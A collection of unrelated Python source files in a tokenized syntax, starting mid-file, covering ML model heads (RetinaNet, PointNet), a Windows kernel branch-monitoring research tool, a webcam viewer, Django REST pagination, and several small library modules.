ret["stream_id"]<block_end><async_keyword><def_stmt>remote_knock self remote_room_hosts:List[str] room_id:str user:UserID content:dict <arrow>Tuple[str int]<block_start>"""Sends a knock to a room. Implements RoomMemberHandler.remote_knock """<line_sep>ret=<await>self._remote_knock_client(remote_room_hosts=remote_room_hosts room_id=room_id user=user content=content )<line_sep><return>ret["event_id"] ret["stream_id"]<block_end><async_keyword><def_stmt>_user_left_room self target:UserID room_id:str<arrow><none><block_start>"""Implements RoomMemberHandler._user_left_room"""<line_sep><await>self._notify_change_client(user_id=target.to_string() room_id=room_id change="left")<block_end><async_keyword><def_stmt>forget self target:UserID room_id:str<arrow><none><block_start><raise>RuntimeError("Cannot forget rooms on workers.")<block_end><block_end>
# Copyright (c) 2021 PPViT Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>math<import_stmt>paddle<import_stmt>paddle.nn<as>nn<import_from_stmt>paddle.nn.initializer Normal Constant<import_from_stmt>retinanet_loss RetinaNetLoss<import_from_stmt>post_process RetinaNetPostProcess<import_from_stmt>det_utils.generator_utils AnchorGenerator<class_stmt>RetinaNetHead(nn.Layer)<block_start>''' The head used in RetinaNet for object classification and box regression. It has two subnets for the two tasks, with a common structure but separate parameters. '''<def_stmt>__init__ self config<block_start>''' Args: input_shape (List[ShapeSpec]): input shape. num_classes (int): number of classes. Used to label background proposals. num_anchors (int): number of generated anchors. conv_dims (List[int]): dimensions for each convolution layer. norm (str or callable): Normalization for conv layers except for the two output layers. See :func:`detectron2.layers.get_norm` for supported types. loss_func (class): the class is used to compute loss. prior_prob (float): Prior weight for computing bias. '''<line_sep>super(RetinaNetHead self).__init__()<line_sep>num_convs=config.RETINANET.NUM_CONVS<line_sep>input_channels=config.RETINANET.INPUT_CHANNELS<line_sep>norm=config.RETINANET.NORM<line_sep>prior_prob=config.RETINANET.PRIOR_PROB<line_sep>self.num_classes=config.RETINANET.NUM_CLASSES<line_sep>self.get_loss=RetinaNetLoss(focal_loss_alpha=config.RETINANET.FOCAL_LOSS_ALPHA focal_loss_gamma=config.RETINANET.FOCAL_LOSS_GAMMA smoothl1_loss_delta=config.RETINANET.SMOOTHL1_LOSS_DELTA positive_thresh=config.RETINANET.POSITIVE_THRESH negative_thresh=config.RETINANET.NEGATIVE_THRESH allow_low_quality=config.RETINANET.ALLOW_LOW_QUALITY num_classes=config.RETINANET.NUM_CLASSES weights=config.RETINANET.WEIGHTS)<line_sep>self.postprocess=RetinaNetPostProcess(score_threshold=config.RETINANET.SCORE_THRESH keep_top_k=config.RETINANET.KEEP_TOPK nms_top_k=config.RETINANET.NMS_TOPK nms_threshold=config.RETINANET.NMS_THRESH bbox_reg_weights=config.RETINANET.WEIGHTS)<line_sep>self.anchor_generator=AnchorGenerator(anchor_sizes=config.RETINANET.ANCHOR_SIZE aspect_ratios=config.RETINANET.ASPECT_RATIOS strides=config.RETINANET.STRIDES offset=config.RETINANET.OFFSET)<line_sep>num_anchors=self.anchor_generator.num_anchors<line_sep>conv_dims=[input_channels]<times>num_convs<line_sep>cls_net=[]<line_sep>reg_net=[]<for_stmt>in_channels,out_channels zip([input_channels]+list(conv_dims) conv_dims)<block_start>cls_net.append(nn.Conv2D(in_channels out_channels kernel_size=3 stride=1 padding=1 weight_attr=paddle.ParamAttr(initializer=Normal(mean=0. std=0.01))))<if_stmt>norm<eq>"bn"<block_start>cls_net.append(nn.BatchNorm2D(out_channels))<block_end>cls_net.append(nn.ReLU())<line_sep>reg_net.append(nn.Conv2D(in_channels out_channels kernel_size=3 stride=1 padding=1 weight_attr=paddle.ParamAttr(initializer=Normal(mean=0. std=0.01))))<if_stmt>norm<eq>"bn"<block_start>reg_net.append(nn.BatchNorm2D(out_channels))<block_end>reg_net.append(nn.ReLU())<block_end>self.cls_net=nn.Sequential(*cls_net)<line_sep>self.reg_net=nn.Sequential(*reg_net)<line_sep>bias_value=-math.log((1-prior_prob)/prior_prob)<line_sep>self.cls_score=nn.Conv2D(conv_dims[-1] num_anchors<times>self.num_classes kernel_size=3 stride=1 padding=1 weight_attr=paddle.ParamAttr(initializer=Normal(mean=0. std=0.01)) bias_attr=paddle.ParamAttr(initializer=Constant(bias_value)))<line_sep>self.bbox_pred=nn.Conv2D(conv_dims[-1] num_anchors<times>4 kernel_size=3 stride=1 padding=1 weight_attr=paddle.ParamAttr(initializer=Normal(mean=0. std=0.01)))<block_end><def_stmt>forward self feats inputs<block_start>''' Returns: loss_dict (dict) | pred_result(tensor), bbox_num(tensor): loss_dict: contains cls_losses and reg_losses. pred_result: the shape is [M, 6], M is the number of final preds, Each row has 6 values: [label, score, xmin, ymin, xmax, ymax] bbox_num: the shape is [N], N is the num of batch_size, bbox_num[i] means the i'th img have bbox_num[i] boxes. '''<line_sep>anchors=self.anchor_generator(feats)<line_sep>pred_scores=[]<line_sep>pred_boxes=[]<for_stmt>feat feats<block_start>pred_scores.append(self.cls_score(self.cls_net(feat)))<line_sep>pred_boxes.append(self.bbox_pred(self.reg_net(feat)))<block_end>pred_scores_list=[transpose_to_bs_hwa_k(s self.num_classes)<for>s pred_scores]<line_sep>pred_boxes_list=[transpose_to_bs_hwa_k(s 4)<for>s pred_boxes]<if_stmt>self.training<block_start>anchors=paddle.concat(anchors)<line_sep>loss_dict=self.get_loss(anchors [pred_scores_list pred_boxes_list] inputs)<line_sep><return>loss_dict<block_end><else_stmt><block_start>img_whwh=paddle.concat([inputs["imgs_shape"][: 1:2] inputs["imgs_shape"][: 0:1]] axis=-1)<line_sep>pred_result,bbox_num=self.postprocess(pred_scores_list pred_boxes_list anchors inputs["scale_factor_wh"] img_whwh)<line_sep><return>pred_result bbox_num<block_end><block_end><block_end><def_stmt>transpose_to_bs_hwa_k tensor k<block_start><assert_stmt>tensor.dim()<eq>4<line_sep>bs,_,h,w=tensor.shape<line_sep>tensor=tensor.reshape([bs -1 k h w])<line_sep>tensor=tensor.transpose([0 3 4 1 2])<line_sep><return>tensor.reshape([bs -1 k])<block_end>
# Copyright (c) 2020. <NAME>, <EMAIL> # Ref: https://github.com/fxia22/pointnet.pytorch/pointnet/model.py <import_stmt>torch torch.nn<as>nn numpy<as>np torch.nn.functional<as>F<import_from_stmt>torch.autograd Variable<def_stmt>feature_transform_regularizer trans<block_start>d=trans.size()[1]<line_sep>I=torch.eye(d)[<none> : :]<if_stmt>trans.is_cuda<block_start>I=I.cuda()<block_end>loss=torch.mean(torch.norm(torch.bmm(trans trans.transpose(2 1)-I) dim=(1 2)))<line_sep><return>loss<block_end># STN -> Spatial Transformer Network <class_stmt>STN3d(nn.Module)<block_start><def_stmt>__init__ self channel<block_start>super(STN3d self).__init__()<line_sep>self.conv1=nn.Conv1d(channel 64 1)# in-channel, out-channel, kernel size self.conv2=nn.Conv1d(64 128 1)<line_sep>self.conv3=nn.Conv1d(128 1024 1)<line_sep>self.fc1=nn.Linear(1024 512)<line_sep>self.fc2=nn.Linear(512 256)<line_sep>self.fc3=nn.Linear(256 9)<line_sep>self.relu=nn.ReLU()<line_sep>self.bn1=nn.BatchNorm1d(64)<line_sep>self.bn2=nn.BatchNorm1d(128)<line_sep>self.bn3=nn.BatchNorm1d(1024)<line_sep>self.bn4=nn.BatchNorm1d(512)<line_sep>self.bn5=nn.BatchNorm1d(256)<block_end><def_stmt>forward self x<block_start>B=x.size()[0]<line_sep>x=F.relu(self.bn1(self.conv1(x)))<line_sep>x=F.relu(self.bn2(self.conv2(x)))<line_sep>x=F.relu(self.bn3(self.conv3(x)))<line_sep>x=torch.max(x 2 keepdim=<false>)[0]# global descriptors x=F.relu(self.bn4(self.fc1(x)))<line_sep>x=F.relu(self.bn5(self.fc2(x)))<line_sep>x=self.fc3(x)<line_sep>iden=Variable(torch.from_numpy(np.eye(3).flatten().astype(np.float32))).view(1 9).repeat(B 1)<if_stmt>x.is_cuda<block_start>iden=iden.cuda()<block_end>x=x+iden<line_sep>x=x.view(-1 3 3)<line_sep><return>x<block_end><block_end><class_stmt>STNkd(nn.Module)<block_start><def_stmt>__init__ self k=64<block_start>super(STNkd self).__init__()<line_sep>self.conv1=nn.Conv1d(k 64 1)<line_sep>self.conv2=nn.Conv1d(64 128 1)<line_sep>self.conv3=nn.Conv1d(128 1024 1)<line_sep>self.fc1=nn.Linear(1024 512)<line_sep>self.fc2=nn.Linear(512 256)<line_sep>self.fc3=nn.Linear(256 k<times>k)<line_sep>self.relu=nn.ReLU()<line_sep>self.bn1=nn.BatchNorm1d(64)<line_sep>self.bn2=nn.BatchNorm1d(128)<line_sep>self.bn3=nn.BatchNorm1d(1024)<line_sep>self.bn4=nn.BatchNorm1d(512)<line_sep>self.bn5=nn.BatchNorm1d(256)<line_sep>self.k=k<block_end><def_stmt>forward self x<block_start>B=x.size()[0]<line_sep>x=F.relu(self.bn1(self.conv1(x)))<line_sep>x=F.relu(self.bn2(self.conv2(x)))<line_sep>x=F.relu(self.bn3(self.conv3(x)))<line_sep>x=torch.max(x 2 keepdim=<false>)[0]<line_sep>x=F.relu(self.bn4(self.fc1(x)))<line_sep>x=F.relu(self.bn5(self.fc2(x)))<line_sep>x=self.fc3(x)<line_sep>iden=Variable(torch.from_numpy(np.eye(self.k).flatten().astype(np.float32))).view(1 self.k<power>2).repeat(B 1)<if_stmt>x.is_cuda<block_start>iden=iden.cuda()<block_end>x=x+iden<line_sep>x=x.view(-1 self.k self.k)<line_sep><return>x<block_end><block_end><class_stmt>PointNetEncoder(nn.Module)<block_start><def_stmt>__init__ self global_feat=<true> feature_transform=<false> channel=3 detailed=<false># when input include normals, it <block_start>super(PointNetEncoder self).__init__()<line_sep>self.stn=STN3d(channel)# Batch * 3 * 3 self.conv1=nn.Conv1d(channel 64 1)<line_sep>self.conv2=nn.Conv1d(64 128 1)<line_sep>self.conv3=nn.Conv1d(128 1024 1)<line_sep>self.bn1=nn.BatchNorm1d(64)<line_sep>self.bn2=nn.BatchNorm1d(128)<line_sep>self.bn3=nn.BatchNorm1d(1024)<line_sep>self.global_feat=global_feat<line_sep>self.feature_transform=feature_transform<if_stmt>self.feature_transform<block_start>self.fstn=STNkd(k=64)<block_end>self.detailed=detailed<block_end><def_stmt>forward self x<block_start>_,D,N=x.size()# Batch Size, Dimension of Point Features, Num of Points trans=self.stn(x)<line_sep>x=x.transpose(2 1)<if_stmt>D<g>3# pdb.set_trace() <block_start>x,feature=x.split([3 D-3] dim=2)<block_end>x=torch.bmm(x trans)<line_sep># feature = torch.bmm(feature, trans) # feature -> normals <if_stmt>D<g>3<block_start>x=torch.cat([x feature] dim=2)<block_end>x=x.transpose(2 1)<line_sep>out1=self.bn1(self.conv1(x))<line_sep>x=F.relu(out1)<if_stmt>self.feature_transform<block_start>trans_feat=self.fstn(x)<line_sep>x=x.transpose(2 1)<line_sep>x=torch.bmm(x trans_feat)<line_sep>x=x.transpose(2 1)<block_end><else_stmt><block_start>trans_feat=<none><block_end>pointfeat=x<line_sep>out2=self.bn2(self.conv2(x))<line_sep>x=F.relu(out2)<line_sep>out3=self.bn3(self.conv3(x))<line_sep># x = self.bn3(self.conv3(x)) x=torch.max(out3 2 keepdim=<false>)[0]<if_stmt>self.global_feat<block_start><return>x trans trans_feat<block_end><elif_stmt>self.detailed<block_start><return>out1 out2 out3 x<block_end><else_stmt># concatenate global and local feature together <block_start>x=x.view(-1 1024 1).repeat(1 1 N)<line_sep><return>torch.cat([x pointfeat] 1) trans trans_feat<block_end><block_end><block_end><class_stmt>PointNetPartSegEncoder(nn.Module)<block_start><def_stmt>__init__ self feature_transform=<true> channel=3<block_start>super(PointNetPartSegEncoder self).__init__()<line_sep>self.stn=STN3d(channel)<line_sep>self.conv1=nn.Conv1d(channel 64 1)<line_sep>self.conv2=nn.Conv1d(64 128 1)<line_sep>self.conv3=nn.Conv1d(128 128 1)<line_sep>self.conv4=nn.Conv1d(128 512 1)<line_sep>self.conv5=nn.Conv1d(512 2048 1)<line_sep>self.bn1=nn.BatchNorm1d(64)<line_sep>self.bn2=nn.BatchNorm1d(128)<line_sep>self.bn3=nn.BatchNorm1d(128)<line_sep>self.bn4=nn.BatchNorm1d(512)<line_sep>self.bn5=nn.BatchNorm1d(2048)<line_sep>self.feature_transform=feature_transform<if_stmt>self.feature_transform<block_start>self.fstn=STNkd(k=128)<block_end><block_end><def_stmt>forward self point_cloud label<block_start>B,D,N=point_cloud.size()<line_sep>trans=self.stn(point_cloud)<line_sep>point_cloud=point_cloud.transpose(2 1)<if_stmt>D<g>3<block_start>point_cloud,feature=point_cloud.split(3 dim=2)<block_end>point_cloud=torch.bmm(point_cloud trans)<if_stmt>D<g>3<block_start>point_cloud=torch.cat([point_cloud feature] dim=2)<block_end>point_cloud=point_cloud.transpose(2 1)<line_sep>out1=F.relu(self.bn1(self.conv1(point_cloud)))<line_sep>out2=F.relu(self.bn2(self.conv2(out1)))<line_sep>out3=F.relu(self.bn3(self.conv3(out2)))<if_stmt>self.feature_transform<block_start>trans_feat=self.fstn(out3)<line_sep>net_transformed=torch.bmm(out3.transpose(2 1) trans_feat)<line_sep>out3=net_transformed.transpose(2 1)<block_end>out4=F.relu(self.bn4(self.conv4(out3)))<line_sep>out5=self.bn5(self.conv5(out4))<line_sep>out_max=torch.max(out5 2 keepdim=<false>)[0]<line_sep>out_max=torch.cat([out_max label.squeeze(1)] 1)<line_sep>expand=out_max.view(-1 2048+16 1).repeat(1 1 N)<line_sep>concat=torch.cat([expand out1 out2 out3 out4 out5] 1)<if_stmt>self.feature_transform<block_start><return>concat trans_feat<block_end><return>concat<block_end><block_end><class_stmt>encoder(nn.Module)<block_start><def_stmt>__init__ self num_channel=3 **kwargs<block_start>super(encoder self).__init__()<line_sep>self.feat=PointNetEncoder(global_feat=<true> channel=num_channel)<block_end><def_stmt>forward self x<block_start>feat,_,_=self.feat(x)<line_sep><return>feat<block_end><block_end><class_stmt>detailed_encoder(nn.Module)<block_start><def_stmt>__init__ self num_channel=3 **kwargs<block_start>super(detailed_encoder self).__init__()<line_sep>self.feat=PointNetEncoder(global_feat=<false> channel=num_channel detailed=<true>)<block_end><def_stmt>forward self x<block_start>out1,out2,out3,x=self.feat(x)<line_sep><return>out1 out2 out3 x<block_end><block_end>
# Kernel introspection module to enrich branch collected data # This code is part of BranchMonitoring framework # Written by: <NAME> - 2017 # Federal University of Parana (UFPR) <import_from_stmt>xml.etree.ElementTree ElementTree# Parse XML <import_stmt>subprocess# Run dump tools <import_stmt>win32file<as>w# Use windows API <import_stmt>time# Wait for data <import_stmt>signal# Interrupt endless loop # Monitoring class - retrieves branch data <class_stmt>Monitor()# class instantiation <block_start><def_stmt>__init__ self save=<none><block_start>self.save=save<line_sep>self.mods=<none># No introspection data at this point signal.signal(signal.SIGINT self.signal_handler)# Installing signal handler # debug print <if_stmt>__debug__<block_start>print("Starting Monitor")<block_end><block_end># open driver handle <def_stmt>__open_driver_handler self<block_start>self.hdevice=w.CreateFile("\\\\.\\BranchMonitor" 0x80000000|0x40000000 0 <none> 3 0x00000080 <none>)<block_end># close driver handle <def_stmt>__close_driver_handler self<block_start>w.CloseHandle(self.hdevice)<block_end># get branch data from driver handle <def_stmt>__get_branch_data self# read bytes and string itself <block_start>tam,string=w.ReadFile(self.hdevice 200 <none>)<line_sep># if no data, return <if_stmt>len(string)<eq>0<block_start><return><none><block_end># case having data <else_stmt># interpret string as hex address <block_start>branch=int(string[8:15][::-1].encode('hex') 16)<line_sep><return>branch<block_end><block_end># signal handler <def_stmt>signal_handler self signal frame<block_start>self.run=<false><block_end># get offset from a given function address # mod: module to look into # offset: offset to look for <def_stmt>offset_to_func self mod offset# get pointer to given module <block_start>funcs=self.exports[mod]<line_sep># default: no offset found last_offset=0<line_sep>last_fname="Unknown"<line_sep># search whole exported symbols <for_stmt>f funcs<block_start>name=f[0]# function name addr=f[1]# function offset rel_addr=f[2]# relative function offset # if we are looking for such offset <if_stmt>offset<eq>addr<or>offset<eq>rel_addr# immediately returns <block_start><return>name<block_end># in case of a jump inside a given function # consider the closest exported symbol <if_stmt>offset<g>addr<and>addr<g>last_offset<block_start>last_offset=addr<line_sep>last_fname=name<block_end><block_end># return "unknown" or the closest symbol <return>last_fname<block_end># identifies to which module a given address refers <def_stmt>addr_to_module self branch# consider only the meaningful bytes <block_start>branch=branch&0xFFFFFFFF<line_sep># look into all loaded modules <for_stmt>m self.mods<block_start>start_addr=mods[m][0]# lowest addr end_addr=mods[m][1]# highestaddr # if branch is inside <if_stmt>branch<ge>start_addr<and>branch<le>end_addr# if there are exported symbols, dig into it <block_start><if_stmt>(self.exports<is><not><none>)# return base_module+function_at_offset <block_start><return>m+"+"+self.offset_to_func(m branch-start_addr)<block_end># otherwise, return just the name <return>m<block_end><block_end># nothing found <return>"Unknown"<block_end># polling loop <def_stmt>loop self mods=<none> exports=<none> save=<false><block_start><if_stmt>save<block_start>log=open(self.save "w")<block_end># default definitions last=""<line_sep>self.mods=mods<line_sep>self.exports=exports<line_sep>self.run=<true><line_sep># debug print <if_stmt>__debug__<block_start>print("Starting looping")<block_end># open handler self.__open_driver_handler()<try_stmt># infinite loop <block_start><while_stmt>(self.run)# try to get a branch tuple <block_start>branch=self.__get_branch_data()<line_sep># check if got <if_stmt>branch<is><not><none># no introspection, just print <block_start><if_stmt>self.mods<is><none><block_start>print("%x"%branch)<block_end><else_stmt># if there's introspection data, dig into it <block_start>module_string=self.addr_to_module(branch)<line_sep># do not print repeated entries <if_stmt>module_string<ne>last<block_start>s="%x <%s>"%(branch module_string)<line_sep>print(s)<if_stmt>save<block_start>log.write(s+"\n")<block_end>last=module_string<block_end><block_end><block_end><else_stmt># no data, sleep <block_start>time.sleep(1)<block_end><block_end><block_end># signal received <finally_stmt># cleanup <block_start><if_stmt>save<block_start>log.close()<block_end>self.__close_driver_handler()<block_end><block_end><block_end># Dumper: the introspection class <class_stmt>Dumper()# instantiation <block_start><def_stmt>__init__ self# set parser configs <block_start>self.parse()<block_end># set parser configs <def_stmt>parse self# External tools are required # DriverView used to enumerate modules # DriverView binary path <block_start>self.drvview_path="driverview-x64\DriverView.exe"<line_sep># DriverView Output file self.drvview_output="driverview-x64\drv.xml"<line_sep># DllView used to map function to offsets # DllView binary path self.dllview_path="dllexp-x64\dllexp.exe"<line_sep># DllView output self.dllview_output="Downloads\dllexp-x64\dll.xml"<block_end># enumerate loaded modules <def_stmt>dump_modules self<block_start><if_stmt>__debug__<block_start>print("Dumping Modules")<block_end># using DriverView s=subprocess.Popen([self.drvview_path "/sxml" self.drvview_output])<line_sep>s.wait()<block_end># get offsets <def_stmt>dump_exports self bin# using DllView <block_start>s=subprocess.Popen([self.dllview_path "/from_files" bin "/sxml" self.dllview_output])<line_sep>s.wait()<block_end># parse exported symbols <def_stmt>parse_exports self<block_start>exp=[]<line_sep>self.dtree=ElementTree()<line_sep>self.dtree.parse(self.dllview_output)<for_stmt>p self.dtree.findall("item")# get function name <block_start>fname=p.find('function_name').text<line_sep># try to get address <try_stmt># address <block_start>addr=int(p.find('address').text 16)<block_end><except_stmt># error, no meaningful address <block_start>addr=0xFFFFFFFF<block_end># also get relative addr rel_addr=int(p.find('relative_address').text 16)<line_sep># add tuple to list exp.append((fname addr rel_addr))<block_end># return list <return>exp<block_end># get offsets and parse <def_stmt>get_exports self bin<block_start><if_stmt>__debug__<block_start>print("Getting Exports for: %s"%bin)<block_end>self.dump_exports(bin)<line_sep><return>self.parse_exports()<block_end># parse loaded modules/drivers <def_stmt>parse_modules self<block_start>mods=dict()<line_sep>exports=dict()<line_sep>self.dtree=ElementTree()<line_sep>self.dtree.parse(self.drvview_output)<for_stmt>p self.dtree.findall("item")# module name <block_start>mod_name=p.find('driver_name').text<line_sep># initial addr mod_addr=int(p.find('address').text.replace("`" "") 16)<line_sep># end addr mod_end_addr=int(p.find('end_address').text.replace("`" "") 16)<line_sep># add to dict - no repeated modules mods[mod_name]=(mod_addr mod_end_addr)<line_sep># try to get exports for the module # returns a list exp=self.get_exports(p.find('filename').text)<line_sep># map module to export list exports[mod_name]=exp<block_end># return module dict and exports dict <return>mods exports<block_end><block_end># "main" <if_stmt>__name__<eq>'__main__'# introspect first <block_start>d=Dumper()<line_sep>d.dump_modules()<line_sep>mods,exports=d.parse_modules()<line_sep># then monitor m=Monitor(save="save.log")<line_sep># infinite loop # introspected data as parameter to the monitor m.loop(mods exports <true>)<block_end># no module import <else_stmt><block_start>print("No module import support yet!")<block_end>
<import_stmt>wx<import_stmt>cv2<line_sep>#---------------------------------------------------------------------- # Panel to display image from camera #---------------------------------------------------------------------- <class_stmt>WebcamPanel(wx.Window)# wx.Panel, wx.Control <block_start><def_stmt>__init__ self parent camera fps=15 flip=<false><block_start>wx.Window.__init__(self parent)<line_sep># remember arguments self.camera=camera<line_sep>self.fps=fps<line_sep>self.flip=flip<line_sep># get frame size ret_value,frame=self.camera.read()<line_sep>height,width=frame.shape[:2]<line_sep># resize panel with camera image self.SetSize((width height))<line_sep>#self.SetMinSize( (width, height) ) # resize main window self.GetParent().GetParent().SetSize((width height+37))# wymaga poprawki aby nie trzeba bylo dawac +37 #self.GetGrandParent().SetSize( (width, height+25) ) #self.GetTopLevelParent().SetSize( (width, height+25) ) # wrong parent frame=cv2.cvtColor(frame cv2.COLOR_BGR2RGB)<if_stmt>self.flip<block_start>frame=cv2.flip(frame 1)<block_end># create bitmap with frame self.bmp=wx.BitmapFromBuffer(width height frame)<line_sep># timer to refresh frames self.timer=wx.Timer(self)<line_sep>self.timer.Start(1000./fps)<line_sep># add functions to events self.Bind(wx.EVT_PAINT self.OnPaint)# run when it is needed self.Bind(wx.EVT_TIMER self.NextFrame)<block_end># run by timer <def_stmt>OnPaint self event<block_start>dc=wx.BufferedPaintDC(self)<line_sep>dc.DrawBitmap(self.bmp 0 0)<block_end><def_stmt>NextFrame self event<block_start>ret_value,frame=self.camera.read()<if_stmt>ret_value<block_start>frame=cv2.cvtColor(frame cv2.COLOR_BGR2RGB)<if_stmt>self.flip<block_start>frame=cv2.flip(frame 1)<block_end>self.bmp.CopyFromBuffer(frame)<line_sep>self.Refresh()<block_end><block_end><block_end>#---------------------------------------------------------------------- # Main Window #---------------------------------------------------------------------- <class_stmt>MainWindow(wx.Frame)<block_start><def_stmt>__init__ self camera fps=10<block_start>wx.Frame.__init__(self <none>)<line_sep>self.panel=wx.Panel(self -1)<line_sep># add sizer self.sizer=wx.BoxSizer(wx.VERTICAL)<line_sep>self.panel.SetSizer(self.sizer)<line_sep># add button self.button=wx.Button(self.panel label="CAPTURE")<line_sep>self.button.Bind(wx.EVT_BUTTON self.OnButton)<line_sep>self.sizer.Add(self.button 0 wx.EXPAND)<line_sep># add panel with webcam image self.webcampanel=WebcamPanel(self.panel camera)<line_sep>self.sizer.Add(self.webcampanel 1 wx.EXPAND)<line_sep>#self.sizer.Layout() #self.webcampanel.Layout() #self.Fit() self.Show()<block_end><def_stmt>OnButton self event<block_start>print("TODO: save image in file")<block_end><block_end>#---------------------------------------------------------------------- camera=cv2.VideoCapture(0)<line_sep>app=wx.App()<line_sep>MainWindow(camera)<line_sep>app.MainLoop()<line_sep>
<def_stmt>arg_to_step arg<block_start><if_stmt>isinstance(arg str)<block_start><return>{'run':arg}<block_end><else_stmt><block_start><return>dict(zip(['run' 'parameters' 'cache'] arg))<block_end><block_end><def_stmt>steps *args<block_start><return>[arg_to_step(arg)<for>arg args]<block_end>
<import_stmt>numpy<as>np<import_stmt>scipy.stats<as>stats<import_from_stmt>UQpy.Distributions.baseclass.Distribution Distribution<class_stmt>DistributionContinuous1D(Distribution)<block_start>""" Parent class for univariate continuous probability distributions. """<def_stmt>__init__ self **kwargs<block_start>super().__init__(**kwargs)<block_end>@staticmethod<def_stmt>_check_x_dimension x<block_start>""" Check the dimension of input x - must be an ndarray of shape (npoints,) or (npoints, 1) """<line_sep>x=np.atleast_1d(x)<if_stmt>len(x.shape)<g>2<or>(len(x.shape)<eq>2<and>x.shape[1]<ne>1)<block_start><raise>ValueError('Wrong dimension in x.')<block_end><return>x.reshape((-1 ))<block_end><def_stmt>_construct_from_scipy self scipy_name=stats.rv_continuous<block_start>self.cdf=<lambda>x:scipy_name.cdf(x=self._check_x_dimension(x) **self.params)<line_sep>self.pdf=<lambda>x:scipy_name.pdf(x=self._check_x_dimension(x) **self.params)<line_sep>self.log_pdf=<lambda>x:scipy_name.logpdf(x=self._check_x_dimension(x) **self.params)<line_sep>self.icdf=<lambda>x:scipy_name.ppf(q=self._check_x_dimension(x) **self.params)<line_sep>self.moments=<lambda>moments2return='mvsk':scipy_name.stats(moments=moments2return **self.params)<line_sep>self.rvs=<lambda>nsamples=1 random_state=<none>:scipy_name.rvs(size=nsamples random_state=random_state **self.params).reshape((nsamples 1))<def_stmt>tmp_fit dist data<block_start>data=self._check_x_dimension(data)<line_sep>fixed_params={}<for_stmt>key,value dist.params.items()<block_start><if_stmt>value<is><not><none><block_start>fixed_params['f'+key]=value<block_end><block_end>params_fitted=scipy_name.fit(data=data **fixed_params)<line_sep><return>dict(zip(dist.order_params params_fitted))<block_end>self.fit=<lambda>data:tmp_fit(self data)<block_end><block_end>
<import_from_stmt>malaya_speech.utils check_file load_graph generate_session nodes_session <import_from_stmt>malaya_speech.model.tf UNET UNETSTFT UNET1D<def_stmt>load model module quantized=<false> **kwargs<block_start>path=check_file(file=model module=module keys={'model':'model.pb'} quantized=quantized **kwargs )<line_sep>g=load_graph(path['model'] **kwargs)<line_sep>inputs=['Placeholder']<line_sep>outputs=['logits']<line_sep>input_nodes,output_nodes=nodes_session(g inputs outputs)<line_sep><return>UNET(input_nodes=input_nodes output_nodes=output_nodes sess=generate_session(graph=g **kwargs) model=model name=module )<block_end><def_stmt>load_stft model module instruments quantized=<false> **kwargs<block_start>path=check_file(file=model module=module keys={'model':'model.pb'} quantized=quantized **kwargs )<line_sep>g=load_graph(path['model'] **kwargs)<line_sep>inputs=['Placeholder']<line_sep>outputs=[f'logits_{i}'<for>i range(len(instruments))]<line_sep>input_nodes,output_nodes=nodes_session(g inputs outputs)<line_sep><return>UNETSTFT(input_nodes=input_nodes output_nodes=output_nodes instruments=instruments sess=generate_session(graph=g **kwargs) model=model name=module )<block_end><def_stmt>load_1d model module quantized=<false> **kwargs<block_start>path=check_file(file=model module=module keys={'model':'model.pb'} quantized=quantized **kwargs )<line_sep>g=load_graph(path['model'] **kwargs)<line_sep>inputs=['Placeholder']<line_sep>outputs=['logits']<line_sep>input_nodes,output_nodes=nodes_session(g inputs outputs)<line_sep><return>UNET1D(input_nodes=input_nodes output_nodes=output_nodes sess=generate_session(graph=g **kwargs) model=model name=module )<block_end>
<import_from_stmt>skrf.vi.vna rs_zva<class_stmt>Analyzer(rs_zva.ZVA)<block_start>DEFAULT_VISA_ADDRESS="GPIB::16::INSTR"<line_sep>NAME="Rhode & Schwartz ZVA"<line_sep>NPORTS=4<line_sep>NCHANNELS=32<line_sep>SCPI_VERSION_TESTED=''<block_end>
# Copyright (c) 2015 Presslabs SRL # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_future_stmt> absolute_import<import_from_stmt>rest_framework.pagination PageNumberPagination<import_from_stmt>rest_framework.response Response<import_from_stmt>rest_framework.settings api_settings<import_from_stmt>rest_framework.utils.urls replace_query_param remove_query_param<class_stmt>LinkHeaderPagination(PageNumberPagination)<block_start>page_size=api_settings.PAGE_SIZE<or>30<line_sep>page_size_query_param='page_size'<line_sep>max_page_size=100<def_stmt>get_last_link self<block_start>url=self.request.build_absolute_uri()<line_sep>page_number=self.page.paginator.num_pages<line_sep><return>replace_query_param(url self.page_query_param page_number)<block_end><def_stmt>get_first_link self display_page_query_param=<true><block_start>url=self.request.build_absolute_uri()<if_stmt>display_page_query_param<block_start>page_number=self.page.paginator.validate_number(1)<line_sep><return>replace_query_param(url self.page_query_param page_number)<block_end><else_stmt><block_start><return>remove_query_param(url self.page_query_param)<block_end><block_end><def_stmt>get_paginated_response self data<block_start>next_url=self.get_next_link()<line_sep>previous_url=self.get_previous_link()<line_sep>first_url=self.get_first_link()<line_sep>last_url=self.get_last_link()<if_stmt>next_url<is><not><none><and>previous_url<is><not><none><block_start>link='<{next_url}>; rel="next", <{previous_url}>; rel="prev"'<block_end><elif_stmt>next_url<is><not><none><block_start>link='<{next_url}>; rel="next"'<block_end><elif_stmt>previous_url<is><not><none><block_start>link='<{previous_url}>; rel="prev"'<block_end><else_stmt><block_start>link=''<block_end><if_stmt>link<block_start>link<augadd>', '<block_end>link<augadd>'<{first_url}>; rel="first", <{last_url}> rel="last"'<line_sep>link=link.format(next_url=next_url previous_url=previous_url first_url=first_url last_url=last_url)<line_sep>headers={'Link':link}<if>link<else>{}<line_sep><return>Response(data headers=headers)<block_end><block_end>
""" categories: Modules,array description: Array deletion not implemented cause: Unknown workaround: Unknown """<import_stmt>array<line_sep>a=array.array('b' (1 2 3))<del_stmt>a[1]<line_sep>print(a)<line_sep>
